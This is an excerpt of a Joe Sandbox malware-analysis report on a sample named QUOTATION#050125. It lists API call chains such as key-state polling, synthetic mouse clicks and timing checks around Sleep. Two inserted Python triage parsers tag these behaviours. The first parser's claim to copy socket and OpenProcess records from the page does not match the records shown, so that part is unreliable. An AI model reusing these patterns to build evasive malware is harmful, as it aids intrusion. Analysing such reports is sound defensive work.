                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                      • String ID:
                                                                                      • API String ID: 666041331-0
                                                                                      • Opcode ID: 6c5f4a52a3fa5066373da70bdc960e6b5b4f4b9e8ee3849f0594fd399df550ed
                                                                                      • Instruction ID: c40585d05bbe82e99b2ebfff2a120ce69578a4861bfc7eee649297b62c074f15
                                                                                      • Opcode Fuzzy Hash: 6c5f4a52a3fa5066373da70bdc960e6b5b4f4b9e8ee3849f0594fd399df550ed
                                                                                      • Instruction Fuzzy Hash: 3B513635600605DFCB15DF68C494DADBBF1FF49324B4580A9E80A9B762DB31ED89CB90
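The records on this page list, per disassembled function, the imports it calls with the logged argument values and the report's similarity keys. The Python below is an added example for working with such records, not part of the report or of Joe Sandbox: it parses records in this layout, decodes the access mask the sample passes to OpenProcess at 0014A435 (0x410), and tags each function by API combinations that matter in triage, such as LoadLibraryW followed by GetProcAddress. The sample input is a constructed, condensed copy of four records from this page (the socket, process and library-loading functions above and the cursor-polling function that follows); the regular expression and the field names it keys on are an assumption about this layout and may need adjustment for other report versions.

```python
"""Parse Joe Sandbox function records in the layout shown on this page and tag each function
by its API mix. Added example, not Joe Sandbox code; the regex assumes this exact layout."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# One API bullet (glyph stripped), e.g. "OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0014A435"
_API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[#\w]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")

# Process access rights from winnt.h, for decoding the first argument of OpenProcess.
_PROCESS_ACCESS = [(0x1, "PROCESS_TERMINATE"), (0x2, "PROCESS_CREATE_THREAD"), (0x8, "PROCESS_VM_OPERATION"),
                   (0x10, "PROCESS_VM_READ"), (0x20, "PROCESS_VM_WRITE"), (0x40, "PROCESS_DUP_HANDLE"),
                   (0x80, "PROCESS_CREATE_PROCESS"), (0x100, "PROCESS_SET_QUOTA"), (0x200, "PROCESS_SET_INFORMATION"),
                   (0x400, "PROCESS_QUERY_INFORMATION"), (0x800, "PROCESS_SUSPEND_RESUME"),
                   (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION")]

# ref = call-site address; args = logged values ("?" = unknown); subcall_of = callee address or "".
ApiCall = namedtuple("ApiCall", "name module ref args subcall_of")

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    api_string_id: str = ""   # the report's cross-sample similarity key

def parse_records(text):
    """A record opens at 'APIs' and closes at 'Instruction Fuzzy Hash' or at end of input."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "APIs":
            cur, section = FunctionRecord(), "apis"
        elif cur is None or not line:
            continue
        elif line in ("Memory Dump Source", "Similarity"):
            section = line
        elif section == "apis" and (m := _API_RE.match(line)):
            args = tuple(m["args"].split(",")) if m["args"] else ()
            cur.calls.append(ApiCall(m["name"], m["module"], m["ref"], args, m["sub"] or ""))
        elif section == "Similarity" and line.startswith("API String ID:"):
            cur.api_string_id = line.split(":", 1)[1].strip()
        elif section == "Similarity" and line.startswith("Instruction Fuzzy Hash:"):
            records.append(cur)
            cur, section = None, None
    if cur is not None and cur.calls:   # record cut off by the page, as the last one here is
        records.append(cur)
    return records

def decode_process_access(hex_mask):
    """'00000410' -> ['PROCESS_VM_READ', 'PROCESS_QUERY_INFORMATION']"""
    mask = int(hex_mask, 16)
    return [name for bit, name in _PROCESS_ACCESS if mask & bit]

def tag_record(rec):
    """Tags for API combinations worth a second look when triaging a sample."""
    names = {c.name for c in rec.calls if not c.subcall_of}
    modules = {c.module for c in rec.calls if not c.subcall_of}
    tags = []
    if names & {"LoadLibraryW", "LoadLibraryA", "LoadLibraryExW"} and "GetProcAddress" in names:
        tags.append("dynamic-api-resolution")   # imports resolved at run time, absent from the IAT
    if modules & {"WSOCK32", "WS2_32"}:
        tags.append("winsock")
    if "OpenProcess" in names:
        tags.append("process-open")
    if "GetAsyncKeyState" in names:
        tags.append("input-polling")
    return tags

def summarize(text):
    """Per record: (first call-site, tags, decoded rights of each OpenProcess call)."""
    return [(r.calls[0].ref, tag_record(r), [decode_process_access(c.args[0]) for c in r.calls
             if c.name == "OpenProcess" and c.args and c.args[0] != "?"]) for r in parse_records(text)]

# Constructed input: a condensed copy of four records from this page.
SAMPLE = """\
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00141DC0
• WSAGetLastError.WSOCK32 ref: 00141DF2
  • Part of subcall function 00143224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0013EC0C), ref: 00143240
Memory Dump Source
Similarity
• API String ID: 3163710072-0
• Instruction Fuzzy Hash: CFB1DD71604340AFC324DF24C895F6A7BA5AF84318F94895CF45A5B2E3DB31ED8ACB91
APIs
• GetCurrentProcessId.KERNEL32 ref: 0014A427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0014A435
Similarity
• API String ID: 3488606520-0
• Instruction Fuzzy Hash: A6A1B0716043019FE720DF24C886F6AB7E5AF84714F55881DF59A9B3D2D7B0EC418B92
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00148F40
• GetProcAddress.KERNEL32(00000000,?), ref: 00148FD0
Similarity
• API String ID: 666041331-0
• Instruction Fuzzy Hash: 3B513635600605DFCB15DF68C494DADBBF1FF49324B4580A9E80A9B762DB31ED89CB90
APIs
• GetAsyncKeyState.USER32(00000001), ref: 000D9183
"""
```

Feed the report text to `summarize` to get one tuple per function. Calls listed under "Part of subcall function" are left out of tagging so that a shared helper's MultiByteToWideChar does not mark every caller, and a record the page cuts off before its hash lines is still returned. The 0x410 mask resolves to PROCESS_QUERY_INFORMATION plus PROCESS_VM_READ, which is what the IoCounters query that follows it needs and nothing more.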
                                                                                      APIs
                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00156C33
                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00156C4A
                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00156C73
                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0013AB79,00000000,00000000), ref: 00156C98
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00156CC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                      • String ID:
                                                                                      • API String ID: 3688381893-0
                                                                                      • Opcode ID: 9c2bae1bad8bc8f710dc28544e4ca507d0099e89715370da3a8783a06a176be9
                                                                                      • Instruction ID: b946714aeeb8eb5d3fc5feb23ee2e71c4033abe0697561862a49708655c759aa
                                                                                      • Opcode Fuzzy Hash: 9c2bae1bad8bc8f710dc28544e4ca507d0099e89715370da3a8783a06a176be9
                                                                                      • Instruction Fuzzy Hash: AC41D635604204EFD724CF28CC55FA97BA5EB09361F950228FCA9AF2E1C371AD85DAC0
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 000D9141
                                                                                      • ScreenToClient.USER32(00000000,?), ref: 000D915E
                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 000D9183
                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 000D919D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                      • String ID:
                                                                                      • API String ID: 4210589936-0
                                                                                      • Opcode ID: d60dfc8047f65869632cac979d2193073a116ab4b933ac3433ff6811a9153a6a
                                                                                      • Instruction ID: 53df3745ed2c6a9a411ca68c8ca088ac6858aebfe65eaf59ca1e272333caf9b9
                                                                                      • Opcode Fuzzy Hash: d60dfc8047f65869632cac979d2193073a116ab4b933ac3433ff6811a9153a6a
                                                                                      • Instruction Fuzzy Hash: 3D416075A0860AFBDF199F64C844BEEB774FF05320F208226E825A73D0C7346994CBA1
                                                                                      APIs
                                                                                      • GetInputState.USER32 ref: 001338CB
                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00133922
                                                                                      • TranslateMessage.USER32(?), ref: 0013394B
                                                                                      • DispatchMessageW.USER32(?), ref: 00133955
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00133966
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                      • String ID:
                                                                                      • API String ID: 2256411358-0
                                                                                      • Opcode ID: 5e6049affda6fdfce261c52e28f3429419d34348fdf011dd35d90bb8a4253c67
                                                                                      • Instruction ID: 04172ca386666c26980e0d17df44222cfbceabf9c95cc5de7649ca78abe69b96
                                                                                      • Opcode Fuzzy Hash: 5e6049affda6fdfce261c52e28f3429419d34348fdf011dd35d90bb8a4253c67
                                                                                      • Instruction Fuzzy Hash: 7931D570904342EEEF35CB34D849BB637A8EB05308F04056EE472C65A0E3B49AC5CB55
                                                                                      APIs
                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0013C21E,00000000), ref: 0013CF38
                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 0013CF6F
                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,0013C21E,00000000), ref: 0013CFB4
                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0013C21E,00000000), ref: 0013CFC8
                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0013C21E,00000000), ref: 0013CFF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                      • String ID:
                                                                                      • API String ID: 3191363074-0
                                                                                      • Opcode ID: ee9fb0d9fd9e1859c408ef7e737433daa9e9f4686ac987671318f0c49c279cf6
                                                                                      • Instruction ID: 09c3423ced454979a1c7cebd99538ac42e6bfac94cf85d9ac496ba870c6b7951
                                                                                      • Opcode Fuzzy Hash: ee9fb0d9fd9e1859c408ef7e737433daa9e9f4686ac987671318f0c49c279cf6
                                                                                      • Instruction Fuzzy Hash: 0B316B71500306EFDB24DFA5C8849ABBBFEEB14311F10842EF506E6601DB30AE41DBA0
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(?,?), ref: 00121915
                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 001219C1
                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 001219C9
                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 001219DA
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001219E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3382505437-0
                                                                                      • Opcode ID: 55efd2e95ace8a38d1163678509c86f997f0a1a21089592b9756659a9b7dafb9
                                                                                      • Instruction ID: c4eb4a62ed7d3f2ca8df01691fa29870492f848b3abe73891cb462da83a180d6
                                                                                      • Opcode Fuzzy Hash: 55efd2e95ace8a38d1163678509c86f997f0a1a21089592b9756659a9b7dafb9
                                                                                      • Instruction Fuzzy Hash: D8319171900229EFCF14CFA8DD99ADE7BB5EB54319F104225F921AB2D1C7709A94CB90
                                                                                      APIs
                                                                                      • IsWindow.USER32(00000000), ref: 00140951
                                                                                      • GetForegroundWindow.USER32 ref: 00140968
                                                                                      • GetDC.USER32(00000000), ref: 001409A4
                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 001409B0
                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 001409E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                      • String ID:
                                                                                      • API String ID: 4156661090-0
                                                                                      • Opcode ID: 3239293efdda94dc5345fe0dd1d30e7dbc6b0ce2d740e28e6eee181006251116
                                                                                      • Instruction ID: 3ae7095384eaa390a5e445eaf1e722d5e75475223cbd48a82212d09b6bbb2410
                                                                                      • Opcode Fuzzy Hash: 3239293efdda94dc5345fe0dd1d30e7dbc6b0ce2d740e28e6eee181006251116
                                                                                      • Instruction Fuzzy Hash: 1F216D35600214EFD704EF65C885AAEBBE9EF58701F04846CF84A9B762CB30AD44CB90
                                                                                      APIs
                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000D9693
                                                                                      • SelectObject.GDI32(?,00000000), ref: 000D96A2
                                                                                      • BeginPath.GDI32(?), ref: 000D96B9
                                                                                      • SelectObject.GDI32(?,00000000), ref: 000D96E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: 2af06f765c6ea15dd036ba1eaef09794f3ec9068fc894614f94e30ddfa0e1066
                                                                                      • Instruction ID: 71d228909d3141b82fdb6e57ed2ced9a99ff6276c34a96134a3b468ac6123681
                                                                                      • Opcode Fuzzy Hash: 2af06f765c6ea15dd036ba1eaef09794f3ec9068fc894614f94e30ddfa0e1066
                                                                                      • Instruction Fuzzy Hash: 46214970802306EFDB119F65EC58BAD7BB9BB5036AF104217F821A66E0D37098D1CBA4
                                                                                      APIs
                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?,?,0012035E), ref: 0012002B
                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?), ref: 00120046
                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?), ref: 00120054
                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?), ref: 00120064
                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?), ref: 00120070
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 3897988419-0
                                                                                      • Opcode ID: 638b3fe3b8cd6a7fdc8ced83bce8677b32c5fa4bdb983c2c7406482715991aa1
                                                                                      • Instruction ID: a1ecdaa1c54751f66b64a71ac297b3c2fa697e974267ba801a29feb8036a8b77
                                                                                      • Opcode Fuzzy Hash: 638b3fe3b8cd6a7fdc8ced83bce8677b32c5fa4bdb983c2c7406482715991aa1
                                                                                      • Instruction Fuzzy Hash: 5201A772600314FFEB114F64EC44BAA7AEDEF48792F144214F905D6221D771DD5087A4
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0012E997
                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 0012E9A5
                                                                                      • Sleep.KERNEL32(00000000), ref: 0012E9AD
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0012E9B7
                                                                                      • Sleep.KERNEL32 ref: 0012E9F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                      • String ID:
                                                                                      • API String ID: 2833360925-0
                                                                                      • Opcode ID: 5722cfd8e1770e25627ec113d6ff09b00caf4f03cb4d30986c5d789fae415ad1
                                                                                      • Instruction ID: 7e696ec471462dfb12bf3799b62137f7ab2d2f4082337ff6a3991765756c4a7d
                                                                                      • Opcode Fuzzy Hash: 5722cfd8e1770e25627ec113d6ff09b00caf4f03cb4d30986c5d789fae415ad1
                                                                                      • Instruction Fuzzy Hash: 41011731C01A39DBCF00AFE5E899AEDBBB8BB09705F010556E502B2241CB3495A4CBA1
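The function records above are a flat listing: each one is an "APIs" call chain with resolved arguments, followed by the plugin's API ID and opcode/instruction hashes. When a report has hundreds of these, an analyst wants to parse them and flag the chains that matter, for example the GetCursorPos/GetAsyncKeyState polling, the PostMessageW pair that sends WM_LBUTTONDOWN (0x0201) then WM_LBUTTONUP (0x0202) with a Sleep between them, and the QueryPerformanceCounter/Sleep/QueryPerformanceCounter sequence behind the "execution timing" signature listed at the top of the report. The parser below is an added example written for this page, not part of the Joe Sandbox report or its tooling. The sample input is a constructed excerpt that copies three of the records on this page (memory-dump lines omitted), the behaviour tags are this example's own reading of each call chain rather than labels the sandbox assigned, and the WM_* values are the documented Windows message numbers.

```python
import re
from collections import Counter

# Constructed sample input: three records copied in the layout this report uses
# (an "APIs" list, then the "Similarity" block). Memory-dump lines are omitted.
SAMPLE_RECORDS = """\
APIs
• GetCursorPos.USER32(?), ref: 000D9141
• ScreenToClient.USER32(00000000,?), ref: 000D915E
• GetAsyncKeyState.USER32(00000001), ref: 000D9183
• GetAsyncKeyState.USER32(00000002), ref: 000D919D
Similarity
• API ID: AsyncState$ClientCursorScreen
• Opcode ID: d60dfc8047f65869632cac979d2193073a116ab4b933ac3433ff6811a9153a6a
APIs
• GetWindowRect.USER32(?,?), ref: 00121915
• PostMessageW.USER32(00000001,00000201,00000001), ref: 001219C1
• Sleep.KERNEL32(00000000,?,?,?), ref: 001219C9
• PostMessageW.USER32(00000001,00000202,00000000), ref: 001219DA
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 001219E2
Similarity
• API ID: MessagePostSleep$RectWindow
• Opcode ID: 55efd2e95ace8a38d1163678509c86f997f0a1a21089592b9756659a9b7dafb9
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 0012E997
• QueryPerformanceFrequency.KERNEL32(?), ref: 0012E9A5
• Sleep.KERNEL32(00000000), ref: 0012E9AD
• QueryPerformanceCounter.KERNEL32(?), ref: 0012E9B7
• Sleep.KERNEL32 ref: 0012E9F3
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• Opcode ID: 5722cfd8e1770e25627ec113d6ff09b00caf4f03cb4d30986c5d789fae415ad1
"""

# One call line: "<Name>.<MODULE>(<args>), ref: <hex address>". The parentheses are
# absent when the plugin recovered no arguments (e.g. "Sleep.KERNEL32 ref: ...").
API_LINE = re.compile(
    r"^• (?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# Documented Windows message numbers seen as the 2nd PostMessageW argument.
WM_LBUTTONDOWN = 0x0201
WM_LBUTTONUP = 0x0202


def parse_records(text):
    """Split the listing into records, one per "APIs" heading."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()  # the report indents every line; ignore that
        if line == "APIs":
            current = {"calls": [], "api_id": None, "opcode_id": None}
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = m.group("args")
            current["calls"].append({
                "name": m.group("name"),
                "module": m.group("module"),
                "args": args.split(",") if args else [],
                "ref": int(m.group("ref"), 16),
            })
        elif line.startswith("• API ID: "):
            current["api_id"] = line[len("• API ID: "):]
        elif line.startswith("• Opcode ID: "):
            current["opcode_id"] = line[len("• Opcode ID: "):]
    return records


def _posted_messages(calls):
    """Resolved message numbers passed as the 2nd argument of PostMessageW."""
    out = set()
    for c in calls:
        if c["name"] == "PostMessageW" and len(c["args"]) >= 2 and c["args"][1] != "?":
            out.add(int(c["args"][1], 16))
    return out


def tag_record(rec):
    """Behaviour tags: this example's own reading of the chain, not sandbox labels."""
    names = Counter(c["name"] for c in rec["calls"])
    tags = []
    if names["GetAsyncKeyState"] and names["GetCursorPos"]:
        tags.append("input-state polling (cursor position + mouse button state)")
    if {WM_LBUTTONDOWN, WM_LBUTTONUP} <= _posted_messages(rec["calls"]):
        tags.append("synthetic left click via PostMessageW (WM_LBUTTONDOWN/WM_LBUTTONUP)")
    if names["QueryPerformanceCounter"] >= 2 and names["Sleep"]:
        tags.append("execution timing around Sleep (debugger/sandbox timing check)")
    return tags


def triage(text):
    """One summary row per record: identifiers, call count, behaviour tags."""
    return [
        {"api_id": r["api_id"], "opcode_id": r["opcode_id"],
         "n_calls": len(r["calls"]), "tags": tag_record(r)}
        for r in parse_records(text)
    ]


if __name__ == "__main__":
    for row in triage(SAMPLE_RECORDS):
        print(row["api_id"], "->", row["tags"] or ["no rule matched"])
```

The Opcode ID is kept in each row so that a hit can be pivoted on across reports: the same AutoIt runtime routine will carry the same opcode hash in other compiled-AutoIt samples, which is what the plugin's "Similarity" block is for. The rules are deliberately narrow (two GetAsyncKeyState calls with a cursor read, the exact down/up message pair, a counter read on both sides of a Sleep); loosen them only with the false-positive rate in mind, since GUI frameworks and installers use several of the same APIs.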
                                                                                      APIs
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00121114
                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121120
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 0012112F
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121136
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0012114D
                                                                                      Memory Dump Source
